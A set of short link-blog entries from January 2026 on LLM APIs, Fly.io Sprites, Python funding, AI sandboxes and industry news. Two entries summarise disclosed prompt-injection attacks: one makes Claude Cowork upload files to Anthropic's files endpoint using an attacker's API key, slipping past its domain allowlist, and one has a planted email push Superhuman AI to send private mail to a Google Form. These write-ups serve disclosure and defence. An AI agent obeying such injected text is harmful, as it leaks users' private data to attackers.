| Open Responses |
https://www.openresponses.org/ |
This is the standardization effort I've most wanted in the world of LLMs: a vendor-neutral specification for the JSON API that clients can use to talk to hosted LLMs.
Open Responses aims to provide exactly that as a documented standard, derived from OpenAI's Responses API.
I was hoping for one based on their older Chat Completions API since so many other products have cloned the already, but basing it on Responses does make sense since that API was designed with the feature of more recent models - such as reasoning traces - baked into the design.
What's certainly notable is the list of launch partners. OpenRouter alone means we can expect to be able to use this protocol with almost every existing model, and Hugging Face, LM Studio, vLLM, Ollama and Vercel cover a huge portion of the common tools used to serve models.
For protocols like this I really want to see a comprehensive, language-independent conformance test site. Open Responses has a subset of that - the official repository includes [src/lib/compliance-tests.ts](https://github.com/openresponses/openresponses/blob/d0f23437b27845d5c3d0abaf5cb5c4a702f26b05/src/lib/compliance-tests.ts) which can be used to exercise a server implementation, and is available as a React app [on the official site](https://www.openresponses.org/compliance) that can be pointed at any implementation served via CORS.
What's missing is the equivalent for clients. I plan to spin up my own client library for this in Python and I'd really like to be able to run that against a conformance suite designed to check that my client correctly handles all of the details. |
2026-01-15 23:56:56+00:00 |
| The Design & Implementation of Sprites |
https://fly.io/blog/design-and-implementation/ |
I [wrote about Sprites last week](https://simonwillison.net/2026/Jan/9/sprites-dev/) Here's Thomas Ptacek from Fly with the insider details on how they work under the hood.
I like this framing of them as "disposable computers":
> Sprites are ball-point disposable computers. Whatever mark you mean to make, we’ve rigged it so you’re never more than a second or two away from having a Sprite to do it with.
I've noticed that new Fly Machines can take a while (up to around a minute) to provision. Sprites solve that by keeping warm pools of unused machines in multiple regions, which is enabled by them all using the same container:
> Now, today, under the hood, Sprites are still Fly Machines. But they all run from a standard container. Every physical worker knows exactly what container the next Sprite is going to start with, so it’s easy for us to keep pools of “empty” Sprites standing by. The result: a Sprite create doesn’t have any heavy lifting to do; it’s basically just doing the stuff we do when we start a Fly Machine.
The most interesting detail is how the persistence layer works. Sprites only charge you for data you have written that differs from the base image and provide ~300ms checkpointing and restores - it turns out that's power by a custom filesystem on top of S3-compatible storage coordinated by Litestream-replicated local SQLite metadata:
> We still exploit NVMe, but not as the root of storage. Instead, it’s a read-through cache for a blob on object storage. S3-compatible object stores are the most trustworthy storage technology we have. I can feel my blood pressure dropping just typing the words “Sprites are backed by object storage.” [...]
>
> The Sprite storage stack is organized around the JuiceFS model (in fact, we currently use a very hacked-up JuiceFS, with a rewritten SQLite metadata backend). It works by splitting storage into data (“chunks”) and metadata (a map of where the “chunks” are). Data chunks live on object stores; metadata lives in fast local storage. In our case, that metadata store is [kept durable with Litestream](https://litestream.io). Nothing depends on local storage. |
2026-01-15 16:08:27+00:00 |
| Claude Cowork Exfiltrates Files |
https://www.promptarmor.com/resources/claude-cowork-exfiltrates-files |
Claude Cowork defaults to allowing outbound HTTP traffic to only a specific list of domains, to help protect the user against prompt injection attacks that exfiltrate their data.
Prompt Armor found a creative workaround: Anthropic's API domain is on that list, so they constructed an attack that includes an attacker's own Anthropic API key and has the agent upload any files it can see to the `https://api.anthropic.com/v1/files` endpoint, allowing the attacker to retrieve their content later. |
2026-01-14 22:15:22+00:00 |
| Anthropic invests $1.5 million in the Python Software Foundation and open source security |
https://pyfound.blogspot.com/2025/12/anthropic-invests-in-python.html?m=1 |
This is outstanding news, especially given our decision to withdraw from that NSF grant application [back in October](https://simonwillison.net/2025/Oct/27/psf-withdrawn-proposal/).
> We are thrilled to announce that Anthropic has entered into a two-year partnership with the Python Software Foundation (PSF) to contribute a landmark total of $1.5 million to support the foundation’s work, with an emphasis on Python ecosystem security. This investment will enable the PSF to make crucial security advances to CPython and the Python Package Index (PyPI) benefiting all users, and it will also sustain the foundation’s core work supporting the Python language, ecosystem, and global community.
Note that while security is a focus these funds will also support other aspects of the PSF's work:
> Anthropic’s support will also go towards the PSF’s core work, including the Developer in Residence program driving contributions to CPython, community support through grants and other programs, running core infrastructure such as PyPI, and more. |
2026-01-13 23:58:17+00:00 |
| Superhuman AI Exfiltrates Emails |
https://www.promptarmor.com/resources/superhuman-ai-exfiltrates-emails |
Classic prompt injection attack:
> When asked to summarize the user’s recent mail, a prompt injection in an untrusted email manipulated Superhuman AI to submit content from dozens of other sensitive emails (including financial, legal, and medical information) in the user’s inbox to an attacker’s Google Form.
To Superhuman's credit they treated this as the high priority incident it is and issued a fix.
The root cause was a CSP rule that allowed markdown images to be loaded from `docs.google.com` - it turns out Google Forms on that domain will persist data fed to them via a GET request! |
2026-01-12 22:24:54+00:00 |
| Don't fall into the anti-AI hype |
https://antirez.com/news/158 |
I'm glad someone was brave enough to say this. There is a *lot* of anti-AI sentiment in the software development community these days. Much of it is justified, but if you let people convince you that AI isn't genuinely useful for software developers or that this whole thing will blow over soon it's becoming clear that you're taking on a very real risk to your future career.
As Salvatore Sanfilippo puts it:
> It does not matter if AI companies will not be able to get their money back and the stock market will crash. All that is irrelevant, in the long run. It does not matter if this or the other CEO of some unicorn is telling you something that is off putting, or absurd. Programming changed forever, anyway.
I do like this hopeful positive outlook on what this could all mean, emphasis mine:
> How do I feel, about all the code I wrote that was ingested by LLMs? I feel great to be part of that, because I see this as a continuation of what I tried to do all my life: democratizing code, systems, knowledge. **LLMs are going to help us to write better software, faster, and will allow small teams to have a chance to compete with bigger companies**. The same thing open source software did in the 90s.
This post has been the subject of heated discussions all day today on both [Hacker News](https://news.ycombinator.com/item?id=46574276) and [Lobste.rs](https://lobste.rs/s/cmsfbu/don_t_fall_into_anti_ai_hype). |
2026-01-11 23:58:43+00:00 |
| TIL from taking Neon I at the Crucible |
https://til.simonwillison.net/neon/neon-1 |
Things I learned about making neon signs after a week long intensive evening class at [the Crucible](https://www.thecrucible.org/) in Oakland. |
2026-01-11 17:35:57+00:00 |
| A Software Library with No Code |
https://www.dbreunig.com/2026/01/08/a-software-library-with-no-code.html |
Provocative experiment from Drew Breunig, who designed a new library for time formatting ("3 hours ago" kind of thing) called "whenwords" that has no code at all, just a carefully written specification, an AGENTS.md and a collection of conformance tests in a YAML file.
Pass that to your coding agent of choice, tell it what language you need and it will write it for you on demand!
This meshes nearly with my recent [interest in conformance suites](https://simonwillison.net/2025/Dec/31/the-year-in-llms/#the-year-of-conformance-suites). If you publish good enough language-independent tests it's pretty astonishing how far today's coding agents can take you! |
2026-01-10 23:41:58+00:00 |
| How Google Got Its Groove Back and Edged Ahead of OpenAI |
https://www.wsj.com/tech/ai/google-ai-openai-gemini-chatgpt-b766e160 |
I picked up a few interesting tidbits from this Wall Street Journal piece on Google's recent hard won success with Gemini.
Here's the origin of the name "Nano Banana":
> Naina Raisinghani, known inside Google for working late into the night, needed a name for the new tool to complete the upload. It was 2:30 a.m., though, and nobody was around. So she just made one up, a mashup of two nicknames friends had given her: Nano Banana.
The WSJ credit OpenAI's Daniel Selsam with un-retiring Sergei Brin:
> Around that time, Google co-founder Sergey Brin, who had recently retired, was at a party chatting with a researcher from OpenAI named Daniel Selsam, according to people familiar with the conversation. Why, Selsam asked him, wasn’t he working full time on AI. Hadn’t the launch of ChatGPT captured his imagination as a computer scientist?
>
> ChatGPT was on its way to becoming a household name in AI chatbots, while Google was still fumbling to get its product off the ground. Brin decided Selsam had a point and returned to work.
And we get some rare concrete user numbers:
> By October, Gemini had more than 650 million monthly users, up from 450 million in July.
The LLM usage number I see cited most often is OpenAI's 800 million weekly active users for ChatGPT. That's from October 6th at OpenAI DevDay so it's comparable to these Gemini numbers, albeit not directly since it's weekly rather than monthly actives.
I'm also never sure what counts as a "Gemini user" - does interacting via Google Docs or Gmail count or do you need to be using a Gemini chat interface directly? |
2026-01-08 15:32:08+00:00 |
| A field guide to sandboxes for AI |
https://www.luiscardoso.dev/blog/sandboxes-for-ai |
This guide to the current sandboxing landscape by Luis Cardoso is comprehensive, dense and absolutely fantastic.
He starts by differentiating between containers (which share the host kernel), microVMs (their own guest kernel behind hardwae virtualization), gVisor userspace kernels and WebAssembly/isolates that constrain everything within a runtime.
The piece then dives deep into terminology, approaches and the landscape of existing tools.
I think using the right sandboxes to safely run untrusted code is one of the most important problems to solve in 2026. This guide is an invaluable starting point. |
2026-01-06 22:38:00+00:00 |